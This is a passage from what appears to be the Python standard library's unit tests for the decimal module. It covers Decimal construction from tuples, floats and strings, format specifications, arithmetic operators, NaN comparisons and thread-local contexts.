self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_list(self):
Decimal = self.decimal.Decimal
d = Decimal([0, [0], 0])
self.assertEqual(str(d), '0')
d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
self.assertEqual(str(d), '-4.34913534E-17')
def test_explicit_from_bool(self):
Decimal = self.decimal.Decimal
self.assertIs(bool(Decimal(0)), False)
self.assertIs(bool(Decimal(1)), True)
self.assertEqual(Decimal(False), Decimal(0))
self.assertEqual(Decimal(True), Decimal(1))
def test_explicit_from_Decimal(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
@requires_IEEE_754
def test_explicit_from_float(self):
Decimal = self.decimal.Decimal
r = Decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertTrue(Decimal(float('nan')).is_qnan())
self.assertTrue(Decimal(float('inf')).is_infinite())
self.assertTrue(Decimal(float('-inf')).is_infinite())
self.assertEqual(str(Decimal(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(Decimal(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(Decimal(float('-inf'))),
str(Decimal('-Infinity')))
self.assertEqual(str(Decimal(float('-0.0'))),
str(Decimal('-0')))
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(Decimal(x))) # roundtrip
def test_explicit_context_create_decimal(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
Rounded = self.decimal.Rounded
nc = copy.copy(self.decimal.getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
d = nc.create_decimal(456)
self.assertIsInstance(d, Decimal)
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading and trailing whitespace should result in a NaN;
# spaces are already checked in Cowlishaw's test-suite, so
# here we just check that a trailing newline results in a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
# more integers
nc.prec = 28
nc.traps[InvalidOperation] = True
for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
2**31-1, 2**31, 2**63-1, 2**63]:
d = nc.create_decimal(v)
self.assertTrue(isinstance(d, Decimal))
self.assertEqual(int(d), v)
nc.prec = 3
nc.traps[Rounded] = True
self.assertRaises(Rounded, nc.create_decimal, 1234)
# from string
nc.prec = 28
self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
self.assertEqual(str(nc.create_decimal('45')), '45')
self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')
# invalid arguments
self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")
# too many NaN payload digits
nc.prec = 3
self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
self.assertRaises(InvalidOperation, nc.create_decimal,
Decimal('NaN12345'))
nc.traps[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
nc.flags[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
def test_explicit_context_create_from_float(self):
Decimal = self.decimal.Decimal
nc = self.decimal.Context()
r = nc.create_decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r), '0.1000000000000000055511151231')
self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
self.assertEqual(str(nc.create_decimal(float('nan'))),
str(nc.create_decimal('NaN')))
self.assertEqual(str(nc.create_decimal(float('inf'))),
str(nc.create_decimal('Infinity')))
self.assertEqual(str(nc.create_decimal(float('-inf'))),
str(nc.create_decimal('-Infinity')))
self.assertEqual(str(nc.create_decimal(float('-0.0'))),
str(nc.create_decimal('-0')))
nc.prec = 100
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip
def test_unicode_digits(self):
Decimal = self.decimal.Decimal
test_values = {
'\uff11': '1',
'\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
'-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
}
for input, expected in test_values.items():
self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
decimal = C
class PyExplicitConstructionTest(ExplicitConstructionTest):
decimal = P
class ImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())
def test_implicit_from_int(self):
Decimal = self.decimal.Decimal
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())
def test_implicit_from_float(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())
def test_implicit_from_Decimal(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
Decimal = self.decimal.Decimal
# Allow other classes to be trained to interact with Decimals
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('/', '__truediv__', '__rtruediv__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
decimal = P
class FormatTest(unittest.TestCase):
'''Unit tests for the format function.'''
def test_formatting(self):
Decimal = self.decimal.Decimal
# triples giving a format, a Decimal, and the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.0n', '3.14159265', '3'), # same for 'n'
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# test alignment and padding
('6', '123', ' 123'),
('<6', '123', '123 '),
('>6', '123', ' 123'),
('^6', '123', ' 123 '),
('=+6', '123', '+ 123'),
('#<10', 'NaN', 'NaN#######'),
('#<10', '-4.3', '-4.3######'),
('#<+10', '0.0130', '+0.0130###'),
('#< 10', '0.0130', ' 0.0130###'),
('@>10', '-Inf', '@-Infinity'),
('#>5', '-Inf', '-Infinity'),
('?^5', '123', '?123?'),
('%^6', '123', '%123%%'),
(' ^6', '-45.6', '-45.6 '),
('/=10', '-45.6', '-/////45.6'),
('/=+10', '45.6', '+/////45.6'),
('/= 10', '45.6', ' /////45.6'),
('\x00=10', '-inf', '-\x00Infinity'),
('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),
# thousands separator
(',', '1234567', '1,234,567'),
(',', '123456', '123,456'),
(',', '12345', '12,345'),
(',', '1234', '1,234'),
(',', '123', '123'),
(',', '12', '12'),
(',', '1', '1'),
(',', '0', '0'),
(',', '-1234567', '-1,234,567'),
(',', '-123456', '-123,456'),
('7,', '123456', '123,456'),
('8,', '123456', ' 123,456'),
('08,', '123456', '0,123,456'), # special case: extra 0 needed
('+08,', '123456', '+123,456'), # but not if there's a sign
(' 08,', '123456', ' 123,456'),
('08,', '-123456', '-123,456'),
('+09,', '123456', '+0,123,456'),
# ... with fractional part...
('07,', '1234.56', '1,234.56'),
('08,', '1234.56', '1,234.56'),
('09,', '1234.56', '01,234.56'),
('010,', '1234.56', '001,234.56'),
('011,', '1234.56', '0,001,234.56'),
('012,', '1234.56', '0,001,234.56'),
('08,.1f', '1234.5', '01,234.5'),
# no thousands separators in fraction part
(',', '1.23456789', '1.23456789'),
(',%', '123.456789', '12,345.6789%'),
(',e', '123456', '1.23456e+5'),
(',E', '123456', '1.23456E+5'),
# issue 6850
('a=-7.0', '0.12345', 'aaaa0.1'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
# bytes format argument
self.assertRaises(TypeError, Decimal(1).__format__, b'-020')
def test_n_format(self):
Decimal = self.decimal.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst]) if self.decimal == C else lst
def get_fmt(x, override=None, fmt='n'):
if self.decimal == C:
return Decimal(x).__format__(fmt, override)
else:
return Decimal(x).__format__(fmt, _localeconv=override)
# Set up some localeconv-like dictionaries
en_US = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
fr_FR = {
'decimal_point' : ',',
'grouping' : make_grouping([CHAR_MAX]),
'thousands_sep' : ''
}
ru_RU = {
'decimal_point' : ',',
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : ' '
}
crazy = {
'decimal_point' : '&',
'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
'thousands_sep' : '-'
}
dotsep_wide = {
'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
}
self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')
self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')
self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')
# zero padding
self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')
self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')
self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')
# wide char separator and decimal point
self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
'-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')
@run_with_locale('LC_ALL', 'ps_AF')
def test_wide_char_separator_decimal_point(self):
# locale with wide char separator and decimal point
import locale
Decimal = self.decimal.Decimal
decimal_point = locale.localeconv()['decimal_point']
thousands_sep = locale.localeconv()['thousands_sep']
if decimal_point != '\u066b':
self.skipTest('inappropriate decimal point separator'
'({!a} not {!a})'.format(decimal_point, '\u066b'))
if thousands_sep != '\u066c':
self.skipTest('inappropriate thousands separator'
'({!a} not {!a})'.format(thousands_sep, '\u066c'))
self.assertEqual(format(Decimal('100000000.123'), 'n'),
'100\u066c000\u066c000\u066b123')
class CFormatTest(FormatTest):
decimal = C
class PyFormatTest(FormatTest):
decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
Decimal = self.decimal.Decimal
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
# comparisons involving signaling nans signal InvalidOperation
# order comparisons (<, <=, >, >=) involving only quiet nans
# also signal InvalidOperation
# equality comparisons (==, !=) involving only quiet nans
# don't signal, but return False or True respectively.
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
order_ops = operator.lt, operator.le, operator.gt, operator.ge
equality_ops = operator.eq, operator.ne
# results when InvalidOperation is not trapped
for x, y in qnan_pairs + snan_pairs:
for op in order_ops + equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
# repeat the above, but this time trap the InvalidOperation
with localcontext() as ctx:
ctx.traps[InvalidOperation] = 1
for x, y in qnan_pairs:
for op in equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for "
"operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
for x, y in snan_pairs:
for op in equality_ops:
                    self.assertRaises(InvalidOperation, op, x, y)
for x, y in qnan_pairs + snan_pairs:
for op in order_ops:
self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
Decimal = self.decimal.Decimal
d = Decimal(1).copy_sign(Decimal(-2))
self.assertEqual(Decimal(1).copy_sign(-2), d)
self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
cls.finish1.set()
cls.synchro.wait()
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
cls.assertTrue(c2.flags[DivisionByZero])
with localcontext() as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertTrue(c3.flags[DivisionByZero])
cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
cls.assertTrue(c3.flags[InvalidOperation])
del c3
cls.assertFalse(c2.flags[InvalidOperation])
del c2
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333333333'))
c1 = getcontext()
cls.assertTrue(c1.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
thiscontext = getcontext()
thiscontext.prec = 18
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
cls.assertTrue(c2.flags[Overflow])
with localcontext(thiscontext) as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertFalse(c3.flags[Overflow])
c3.traps[Underflow] = True
cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
cls.assertTrue(c3.flags[Underflow])
del c3
cls.assertFalse(c2.flags[Underflow])
cls.assertFalse(c2.traps[Underflow])
del c2
cls.synchro.set()
cls.finish2.set()
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333'))
cls.assertFalse(thiscontext.traps[Underflow])
cls.assertTrue(thiscontext.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(thiscontext.flags[sig])
class ThreadingTest(unittest.TestCase):
'''Unit tests for thread local contexts in Decimal.'''
    # Take care when executing this test from IDLE: there is an unresolved
    # issue in threading that hangs IDLE, and its cause has not been found.
def test_threading(self):
DefaultContext = self.decimal.DefaultContext
if self.decimal == C and not self.decimal.HAVE_THREADS:
self.skipTest("compiled without threading")
# Test the "threading isolation" of a Context. Also test changing
# the DefaultContext, which acts as a template for the thread-local
# contexts.
save_prec = DefaultContext.prec
save_emax = DefaultContext.Emax
save_emin = DefaultContext.Emin
DefaultContext.prec = 24
DefaultContext.Emax = 425000000
DefaultContext.Emin = -425000000
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish2.wait()
for sig in Signals[self.decimal]:
self.assertFalse(DefaultContext.flags[sig])
DefaultContext.prec = save_prec
DefaultContext.Emax = save_emax
DefaultContext.Emin = save_emin
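    # A minimal illustrative sketch (not collected by unittest): each new
    # thread starts from DefaultContext, so context changes made in one
    # thread are invisible in another.
    def _sketch_threadlocal_context(self):
        import threading, decimal
        before = decimal.getcontext().prec            # this thread's precision
        results = {}
        def worker():
            decimal.getcontext().prec = 5             # affects the worker only
            results['worker'] = str(decimal.Decimal(1) / decimal.Decimal(3))
        t = threading.Thread(target=worker)
        t.start()
        t.join()
        assert results['worker'] == '0.33333'         # five digits in the worker
        assert decimal.getcontext().prec == before    # unchanged here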
@unittest.skipUnless(threading, 'threading required')
